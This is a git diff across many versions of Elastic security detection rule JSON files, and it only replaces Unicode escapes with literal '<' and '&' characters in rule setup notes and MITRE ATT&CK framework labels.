+++ b/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_103.json
@@ -52,7 +52,7 @@
 ],
 "risk_score": 47,
 "rule_id": "02a4576a-7480-4284-9327-548a806b5e48",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_104.json b/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_104.json
index c5165db7748..bc6536fc987 100644
--- a/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_104.json
@@ -52,7 +52,7 @@
 ],
 "risk_score": 47,
 "rule_id": "02a4576a-7480-4284-9327-548a806b5e48",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_105.json b/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_105.json
index 193fd955fac..c668c9daf75 100644
--- a/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_105.json
@@ -52,7 +52,7 @@
 ],
 "risk_score": 47,
 "rule_id": "02a4576a-7480-4284-9327-548a806b5e48",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_206.json b/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_206.json
index 500c9612ba8..f0751068692 100644
--- a/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_206.json
+++ b/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_206.json
@@ -52,7 +52,7 @@
 ],
 "risk_score": 47,
 "rule_id": "02a4576a-7480-4284-9327-548a806b5e48",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_207.json b/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_207.json
index 79064bb8fad..ac2f33deb42 100644
--- a/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_207.json
+++ b/packages/security_detection_engine/kibana/security_rule/02a4576a-7480-4284-9327-548a806b5e48_207.json
@@ -51,7 +51,7 @@
 ],
 "risk_score": 47,
 "rule_id": "02a4576a-7480-4284-9327-548a806b5e48",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_102.json b/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_102.json
index 5e0a439390b..494739f1842 100644
--- a/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_102.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_103.json b/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_103.json
index cda3650dcf5..43ef0c4cf3b 100644
--- a/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_103.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_104.json b/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_104.json
index e9fa702f66e..36659905939 100644
--- a/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_104.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_105.json b/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_105.json
index ab6c3ab9368..84209918a69 100644
--- a/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/02ea4563-ec10-4974-b7de-12e65aa4f9b3_105.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_101.json b/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_101.json
index e43646dba83..83fe82eff80 100644
--- a/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_101.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_102.json b/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_102.json
index 18b47600d76..9cdbf9bf111 100644
--- a/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/03024bd9-d23f-4ec1-8674-3cf1a21e130b_102.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_104.json b/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_104.json
index 9c05bc941e4..506b4b7e7b2 100644
--- a/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_104.json
@@ -70,7 +70,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_105.json b/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_105.json
index 8a50c1ab0bd..9aa6ab6a7ca 100644
--- a/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_105.json
@@ -69,7 +69,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_106.json b/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_106.json
index 854eecf6da1..3e6d25f384e 100644
--- a/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/035889c4-2686-4583-a7df-67f89c292f2c_106.json
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0040",
 "name": "Impact",
diff --git a/packages/security_detection_engine/kibana/security_rule/03a514d9-500e-443e-b6a9-72718c548f6c_1.json b/packages/security_detection_engine/kibana/security_rule/03a514d9-500e-443e-b6a9-72718c548f6c_1.json
index e3d75666442..97ca3e4743d 100644
--- a/packages/security_detection_engine/kibana/security_rule/03a514d9-500e-443e-b6a9-72718c548f6c_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/03a514d9-500e-443e-b6a9-72718c548f6c_1.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
@@ -84,7 +84,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/03a514d9-500e-443e-b6a9-72718c548f6c_2.json b/packages/security_detection_engine/kibana/security_rule/03a514d9-500e-443e-b6a9-72718c548f6c_2.json
index a0e1cd89900..3b6a498cde4 100644
--- a/packages/security_detection_engine/kibana/security_rule/03a514d9-500e-443e-b6a9-72718c548f6c_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/03a514d9-500e-443e-b6a9-72718c548f6c_2.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
@@ -83,7 +83,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/03c23d45-d3cb-4ad4-ab5d-b361ffe8724a_1.json b/packages/security_detection_engine/kibana/security_rule/03c23d45-d3cb-4ad4-ab5d-b361ffe8724a_1.json
index ded087d28cf..2d460f59efc 100644
--- a/packages/security_detection_engine/kibana/security_rule/03c23d45-d3cb-4ad4-ab5d-b361ffe8724a_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/03c23d45-d3cb-4ad4-ab5d-b361ffe8724a_1.json
@@ -52,7 +52,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/03c23d45-d3cb-4ad4-ab5d-b361ffe8724a_2.json b/packages/security_detection_engine/kibana/security_rule/03c23d45-d3cb-4ad4-ab5d-b361ffe8724a_2.json
index c327efded64..87e3b95063d 100644
--- a/packages/security_detection_engine/kibana/security_rule/03c23d45-d3cb-4ad4-ab5d-b361ffe8724a_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/03c23d45-d3cb-4ad4-ab5d-b361ffe8724a_2.json
@@ -53,7 +53,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_103.json b/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_103.json
index 2c767312374..6c1838f53fc 100644
--- a/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_103.json
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -88,7 +88,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -103,7 +103,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_104.json b/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_104.json
index 12e39841bb4..2c4c6513992 100644
--- a/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_104.json
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -87,7 +87,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -102,7 +102,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_105.json b/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_105.json
index fae3430f477..ac05dc66e4e 100644
--- a/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_105.json
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -88,7 +88,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -103,7 +103,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_106.json b/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_106.json
index 175c2ab86b9..c9396395ed3 100644
--- a/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_106.json
@@ -79,7 +79,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -94,7 +94,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -109,7 +109,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_107.json b/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_107.json
index 5470b8fdedf..edf5ee31a66 100644
--- a/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/0415f22a-2336-45fa-ba07-618a5942e22c_107.json
@@ -79,7 +79,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -94,7 +94,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -109,7 +109,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/04c5a96f-19c5-44fd-9571-a0b033f9086f_101.json b/packages/security_detection_engine/kibana/security_rule/04c5a96f-19c5-44fd-9571-a0b033f9086f_101.json
index dc787f59856..379b648062c 100644
--- a/packages/security_detection_engine/kibana/security_rule/04c5a96f-19c5-44fd-9571-a0b033f9086f_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/04c5a96f-19c5-44fd-9571-a0b033f9086f_101.json
@@ -59,7 +59,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/04c5a96f-19c5-44fd-9571-a0b033f9086f_102.json b/packages/security_detection_engine/kibana/security_rule/04c5a96f-19c5-44fd-9571-a0b033f9086f_102.json
index 0c9f4a87578..ac7887310a6 100644
--- a/packages/security_detection_engine/kibana/security_rule/04c5a96f-19c5-44fd-9571-a0b033f9086f_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/04c5a96f-19c5-44fd-9571-a0b033f9086f_102.json
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_104.json b/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_104.json
index c545810fb40..1cecd1d73a1 100644
--- a/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_104.json
@@ -62,7 +62,7 @@
 ],
 "risk_score": 73,
 "rule_id": "053a0387-f3b5-4ba5-8245-8002cca2bd08",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_105.json b/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_105.json
index 9d0f1ee817b..b3aa81388f8 100644
--- a/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_105.json
@@ -62,7 +62,7 @@
 ],
 "risk_score": 73,
 "rule_id": "053a0387-f3b5-4ba5-8245-8002cca2bd08",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -73,7 +73,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_106.json b/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_106.json
index c1d1f89418f..a678376659b 100644
--- a/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_106.json
@@ -62,7 +62,7 @@
 ],
 "risk_score": 73,
 "rule_id": "053a0387-f3b5-4ba5-8245-8002cca2bd08",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_107.json b/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_107.json
index bc51dd7ab9f..f5e1fae5431 100644
--- a/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_107.json
@@ -62,7 +62,7 @@
 ],
 "risk_score": 73,
 "rule_id": "053a0387-f3b5-4ba5-8245-8002cca2bd08",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_108.json b/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_108.json
index aef7bfa476b..598a0580256 100644
--- a/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/053a0387-f3b5-4ba5-8245-8002cca2bd08_108.json
@@ -61,7 +61,7 @@
 ],
 "risk_score": 73,
 "rule_id": "053a0387-f3b5-4ba5-8245-8002cca2bd08",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -74,7 +74,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/054db96b-fd34-43b3-9af2-587b3bd33964_1.json b/packages/security_detection_engine/kibana/security_rule/054db96b-fd34-43b3-9af2-587b3bd33964_1.json
new file mode 100644
index 00000000000..0ba01e5709d
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/054db96b-fd34-43b3-9af2-587b3bd33964_1.json
